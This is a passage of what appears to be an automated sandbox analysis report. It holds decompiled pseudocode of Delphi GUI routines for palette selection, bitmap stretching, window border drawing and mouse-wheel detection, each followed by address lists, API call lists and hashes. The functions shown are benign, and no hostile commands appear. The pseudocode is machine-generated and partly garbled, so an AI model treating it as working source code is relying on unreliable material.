								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t452);
								 *[fs:eax] = _t452;
								_push(0x466a32);
								return E004035B4(_v16);
							}
						}
					}
				}
			}











































                                                                                0x0046647d
                                                                                0x0046647f
                                                                                0x00466485
                                                                                0x00466488
                                                                                0x0046648f
                                                                                0x0046649a
                                                                                0x0046649a
                                                                                0x004664a6
                                                                                0x004664ad
                                                                                0x00466a49
                                                                                0x00466a51
                                                                                0x004664b3
                                                                                0x004664bb
                                                                                0x004664cd
                                                                                0x00000000
                                                                                0x004664d3
                                                                                0x004664db
                                                                                0x004664e7
                                                                                0x004664ea
                                                                                0x004664f7
                                                                                0x00466500
                                                                                0x00466502
                                                                                0x00466509
                                                                                0x00466517
                                                                                0x00466517
                                                                                0x00466520
                                                                                0x0046652d
                                                                                0x0046652d
                                                                                0x0046653c
                                                                                0x0046654a
                                                                                0x00466554
                                                                                0x0046655e
                                                                                0x0046656c
                                                                                0x00466581
                                                                                0x00466591
                                                                                0x0046659d
                                                                                0x004665a9
                                                                                0x004665a9
                                                                                0x004665c2
                                                                                0x004665ca
                                                                                0x004665ca
                                                                                0x004665cc
                                                                                0x004665d9
                                                                                0x004665dc
                                                                                0x004665e3
                                                                                0x004665f5
                                                                                0x004665fd
                                                                                0x00466600
                                                                                0x00466604
                                                                                0x00466646
                                                                                0x00466606
                                                                                0x00466622
                                                                                0x00466622
                                                                                0x00000000
                                                                                0x004665ce
                                                                                0x004665ce
                                                                                0x00466651
                                                                                0x00466656
                                                                                0x00466664
                                                                                0x00466673
                                                                                0x00466682
                                                                                0x00466690
                                                                                0x0046669a
                                                                                0x0046669d
                                                                                0x004666a0
                                                                                0x004666a4
                                                                                0x0046688d
                                                                                0x00466897
                                                                                0x004668a7
                                                                                0x004668b1
                                                                                0x004668b3
                                                                                0x004668b9
                                                                                0x004668be
                                                                                0x004668c0
                                                                                0x004668d2
                                                                                0x004668d7
                                                                                0x004668dc
                                                                                0x004668f1
                                                                                0x004668f1
                                                                                0x004668fb
                                                                                0x00466908
                                                                                0x00466912
                                                                                0x0046691c
                                                                                0x00466929
                                                                                0x00466938
                                                                                0x0046694a
                                                                                0x00466960
                                                                                0x00466974
                                                                                0x00466981
                                                                                0x00466990
                                                                                0x004669a2
                                                                                0x004669b8
                                                                                0x004669cc
                                                                                0x004666aa
                                                                                0x004666b2
                                                                                0x004666bc
                                                                                0x004666c9
                                                                                0x004666d3
                                                                                0x004666df
                                                                                0x004666e9
                                                                                0x004666fc
                                                                                0x00466704
                                                                                0x0046670d
                                                                                0x00466711
                                                                                0x00466719
                                                                                0x0046671a
                                                                                0x0046672a
                                                                                0x00466737
                                                                                0x0046673c
                                                                                0x00466747
                                                                                0x0046676a
                                                                                0x0046677f
                                                                                0x00466787
                                                                                0x00466790
                                                                                0x00466794
                                                                                0x0046679c
                                                                                0x0046679d
                                                                                0x004667ad
                                                                                0x004667ba
                                                                                0x004667bf
                                                                                0x004667ca
                                                                                0x004667ed
                                                                                0x004667fd
                                                                                0x00466801
                                                                                0x00466809
                                                                                0x0046680a
                                                                                0x00466812
                                                                                0x0046681b
                                                                                0x0046681f
                                                                                0x00466827
                                                                                0x00466828
                                                                                0x00466838
                                                                                0x00466845
                                                                                0x0046684a
                                                                                0x00466855
                                                                                0x00466878
                                                                                0x00466878
                                                                                0x004669d1
                                                                                0x004669d3
                                                                                0x004669d6
                                                                                0x004669d9
                                                                                0x004669e1
                                                                                0x004669ee
                                                                                0x004665d0
                                                                                0x004665d1
                                                                                0x004665d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00466a15
                                                                                0x00466a17
                                                                                0x00466a1a
                                                                                0x00466a1d
                                                                                0x00466a2a
                                                                                0x00466a2a
                                                                                0x004665ce
                                                                                0x004665cc
                                                                                0x004664cd

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction ID: b98e89a6adbca2397a49e089f3fa7ccc612caa931b427b032da4384d08e47561
                                                                                • Opcode Fuzzy Hash: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction Fuzzy Hash: 0B026070B00214AFC700EFA9D982E9EB7F5EF49315F51446AF801BB392DA78ED458B25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423C58, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E00423C58(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x423ea4; // 0xf
				E0041FE98(_v8, __ecx, _t173);
				E004242C8(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L4:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L4;
					}
				}
				if(_t82 == 0) {
					if(E00423FE4(_t165) == 0) {
						SetStretchBltMode(E0041FDC4(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x423e95);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424268(_t165, _t166);
				}
				_t89 = E00423F28(_t165);
				_t177 =  *0x423ea4; // 0xf
				E0041FE98(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00423F28(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E00423E9C);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x423e2a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E004201BC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420360( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00423F28(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x423e6f);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}


























                                                                                0x00423c58
                                                                                0x00423c59
                                                                                0x00423c5b
                                                                                0x00423c61
                                                                                0x00423c63
                                                                                0x00423c66
                                                                                0x00423c68
                                                                                0x00423c6b
                                                                                0x00423c74
                                                                                0x00423c7b
                                                                                0x00423c82
                                                                                0x00423c85
                                                                                0x00423c89
                                                                                0x00423c8e
                                                                                0x00423c9f
                                                                                0x00423ca9
                                                                                0x00423cae
                                                                                0x00423cae
                                                                                0x00423cc0
                                                                                0x00423cca
                                                                                0x00423ccf
                                                                                0x00423cd3
                                                                                0x00423cd8
                                                                                0x00423ce9
                                                                                0x00423ce9
                                                                                0x00423cda
                                                                                0x00423cde
                                                                                0x00423ce7
                                                                                0x00423ced
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423ce7
                                                                                0x00423cf1
                                                                                0x00423d34
                                                                                0x00423d41
                                                                                0x00423d41
                                                                                0x00423cf3
                                                                                0x00423cfe
                                                                                0x00423d0c
                                                                                0x00423d24
                                                                                0x00423d24
                                                                                0x00423d48
                                                                                0x00423d49
                                                                                0x00423d4e
                                                                                0x00423d51
                                                                                0x00423d5d
                                                                                0x00423d61
                                                                                0x00423d61
                                                                                0x00423d68
                                                                                0x00423d6d
                                                                                0x00423d73
                                                                                0x00423d81
                                                                                0x00423e6a
                                                                                0x00423e71
                                                                                0x00423e74
                                                                                0x00423e77
                                                                                0x00423e80
                                                                                0x00000000
                                                                                0x00423e8f
                                                                                0x00423e94
                                                                                0x00423d87
                                                                                0x00423d89
                                                                                0x00423d8e
                                                                                0x00423d93
                                                                                0x00423d94
                                                                                0x00423d99
                                                                                0x00423d9c
                                                                                0x00423dab
                                                                                0x00423dbb
                                                                                0x00423df5
                                                                                0x00423dfa
                                                                                0x00423dfc
                                                                                0x00423dff
                                                                                0x00423e02
                                                                                0x00423e0b
                                                                                0x00423e15
                                                                                0x00423e15
                                                                                0x00423e1e
                                                                                0x00000000
                                                                                0x00423e24
                                                                                0x00423e29
                                                                                0x00423e29

                                                                                APIs
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • SelectPalette.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • RealizePalette.GDI32(?), ref: 00423CA9
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 00423CBB
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 00423D41
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                • SelectObject.GDI32(?,00000000), ref: 00423E15
                                                                                • DeleteDC.GDI32(00000000), ref: 00423E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 2414602066-0
                                                                                • Opcode ID: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction ID: 930dc268f662767776c74af4ca258a037dfb2cb6be22551be327afb4fc9958b1
                                                                                • Opcode Fuzzy Hash: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction Fuzzy Hash: C67148B5B00215AFDB00EFA9D985F5EB7F8AF09304F51856AF508EB281D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004201CC, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E004201CC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x42031a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E00420114(_t77);
					}
					_push(_t93);
					_push(0x420289);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E00420114(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x420290);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(E00420321);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}




















                                                                                0x004201cd
                                                                                0x004201cf
                                                                                0x004201da
                                                                                0x004201db
                                                                                0x004201dc
                                                                                0x004201de
                                                                                0x004201e8
                                                                                0x004201f2
                                                                                0x004201f7
                                                                                0x004201f8
                                                                                0x004201fd
                                                                                0x00420200
                                                                                0x0042020d
                                                                                0x00420214
                                                                                0x00420235
                                                                                0x0042023c
                                                                                0x0042023e
                                                                                0x0042023e
                                                                                0x00420245
                                                                                0x00420246
                                                                                0x0042024b
                                                                                0x0042024e
                                                                                0x00420262
                                                                                0x00420269
                                                                                0x0042026b
                                                                                0x0042026b
                                                                                0x00420272
                                                                                0x00420275
                                                                                0x00420278
                                                                                0x00420288
                                                                                0x00420216
                                                                                0x00420229
                                                                                0x00420294
                                                                                0x004202a3
                                                                                0x004202b2
                                                                                0x004202d9
                                                                                0x004202e0
                                                                                0x004202e7
                                                                                0x004202e7
                                                                                0x004202ee
                                                                                0x004202f5
                                                                                0x004202f5
                                                                                0x004202ee
                                                                                0x004202fc
                                                                                0x004202ff
                                                                                0x00420302
                                                                                0x0042030b
                                                                                0x00420319
                                                                                0x00420319

                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004201E3
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004201ED
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0042020D
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00420224
                                                                                • GetDC.USER32(00000000), ref: 00420230
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042025D
                                                                                • ReleaseDC.USER32 ref: 00420283
                                                                                • SelectObject.GDI32(?,?), ref: 0042029E
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202AD
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004202D9
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202E7
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202F5
                                                                                • DeleteDC.GDI32(?), ref: 0042030B
                                                                                • DeleteDC.GDI32(?), ref: 00420314
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 644427674-0
                                                                                • Opcode ID: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction ID: 7d38c530bc7270683e9fe1384592e284e1f201ef5219feca1b4d3c6428f362da
                                                                                • Opcode Fuzzy Hash: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction Fuzzy Hash: 5F410AB1B40219AFDB00EAE9D846FAFB7FCEB09704F514466F615F7281C6786D108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043CB6C, Relevance: 19.7, APIs: 13, Instructions: 213COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 52%
                                                                                			E0043CB6C(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t190;
				intOrPtr* _t193;
				void* _t202;
				intOrPtr _t209;
				signed int _t226;
				void* _t229;
				void* _t231;
				intOrPtr _t232;

				_t229 = _t231;
				_t232 = _t231 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E0043BD14(_v8));
					_push(_t229);
					_push(0x43cdd2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t232;
					GetClientRect(E0043BD14(_v8),  &_v32);
					GetWindowRect(E0043BD14(_v8),  &_v48);
					MapWindowPoints(0, E0043BD14(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t202 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t202 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t202 = _t202 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t226 = GetWindowLongA(E0043BD14(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t202;
						}
						if((_t226 & 0x00200000) != 0) {
							_t193 =  *0x486b30; // 0x487a94
							_v48.right = _v48.right +  *((intOrPtr*)( *_t193))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t202;
						}
						if((_t226 & 0x00100000) != 0) {
							_t190 =  *0x486b30; // 0x487a94
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t190))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x46b99c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x46b9ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x46b9bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x46b9cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041F36C( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t209);
					 *[fs:eax] = _t209;
					_push(0x43cdd9);
					return ReleaseDC(E0043BD14(_v8), _v16);
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

















                                                                                0x0043cb6d
                                                                                0x0043cb6f
                                                                                0x0043cb75
                                                                                0x0043cb78
                                                                                0x0043cb85
                                                                                0x0043cba5
                                                                                0x0043cbaa
                                                                                0x0043cbab
                                                                                0x0043cbb0
                                                                                0x0043cbb3
                                                                                0x0043cbc3
                                                                                0x0043cbd5
                                                                                0x0043cbeb
                                                                                0x0043cc00
                                                                                0x0043cc19
                                                                                0x0043cc24
                                                                                0x0043cc25
                                                                                0x0043cc26
                                                                                0x0043cc27
                                                                                0x0043cc37
                                                                                0x0043cc42
                                                                                0x0043cc43
                                                                                0x0043cc44
                                                                                0x0043cc45
                                                                                0x0043cc50
                                                                                0x0043cc56
                                                                                0x0043cc62
                                                                                0x0043cc67
                                                                                0x0043cc67
                                                                                0x0043cc77
                                                                                0x0043cc7c
                                                                                0x0043cc7c
                                                                                0x0043cc92
                                                                                0x0043cc9e
                                                                                0x0043cca0
                                                                                0x0043cca0
                                                                                0x0043ccad
                                                                                0x0043ccaf
                                                                                0x0043ccaf
                                                                                0x0043ccbc
                                                                                0x0043ccbe
                                                                                0x0043ccbe
                                                                                0x0043ccc7
                                                                                0x0043cccb
                                                                                0x0043ccd4
                                                                                0x0043ccd4
                                                                                0x0043cce1
                                                                                0x0043cce3
                                                                                0x0043cce3
                                                                                0x0043ccec
                                                                                0x0043ccf0
                                                                                0x0043ccf9
                                                                                0x0043ccf9
                                                                                0x0043cd59
                                                                                0x0043cd59
                                                                                0x0043cd72
                                                                                0x0043cd7d
                                                                                0x0043cd7e
                                                                                0x0043cd7f
                                                                                0x0043cd80
                                                                                0x0043cd91
                                                                                0x0043cdad
                                                                                0x0043cdb4
                                                                                0x0043cdb7
                                                                                0x0043cdba
                                                                                0x0043cdd1
                                                                                0x0043cdd9
                                                                                0x0043cdea
                                                                                0x0043cdea

                                                                                APIs
                                                                                • GetWindowDC.USER32(00000000), ref: 0043CBA0
                                                                                • GetClientRect.USER32 ref: 0043CBC3
                                                                                • GetWindowRect.USER32 ref: 0043CBD5
                                                                                • MapWindowPoints.USER32 ref: 0043CBEB
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CC00
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043CC19
                                                                                • InflateRect.USER32(?,00000000,00000000), ref: 0043CC37
                                                                                • GetWindowLongA.USER32 ref: 0043CC8D
                                                                                • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043CD59
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CD72
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CD91
                                                                                • FillRect.USER32 ref: 0043CDAD
                                                                                • ReleaseDC.USER32 ref: 0043CDCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                                                • String ID:
                                                                                • API String ID: 3115931838-0
                                                                                • Opcode ID: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction ID: 87f5691973d99f2f36ea90999ad42d0aa71137b0dd96603b0bfef02937046dfa
                                                                                • Opcode Fuzzy Hash: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction Fuzzy Hash: C781F571E00209AFCB41DBA9C985EEEB7F9AF09304F1440A6F514F7292C779AE04CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004072BC, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004072BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                                0x004072c3
                                                                                0x004072c5
                                                                                0x004072c7
                                                                                0x004072d9
                                                                                0x004072e8
                                                                                0x004072f4
                                                                                0x00407300
                                                                                0x00407305
                                                                                0x00407324
                                                                                0x0040730b
                                                                                0x0040731b
                                                                                0x0040731b
                                                                                0x00407329
                                                                                0x00407346
                                                                                0x0040732f
                                                                                0x0040733f
                                                                                0x0040733f
                                                                                0x00407353

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
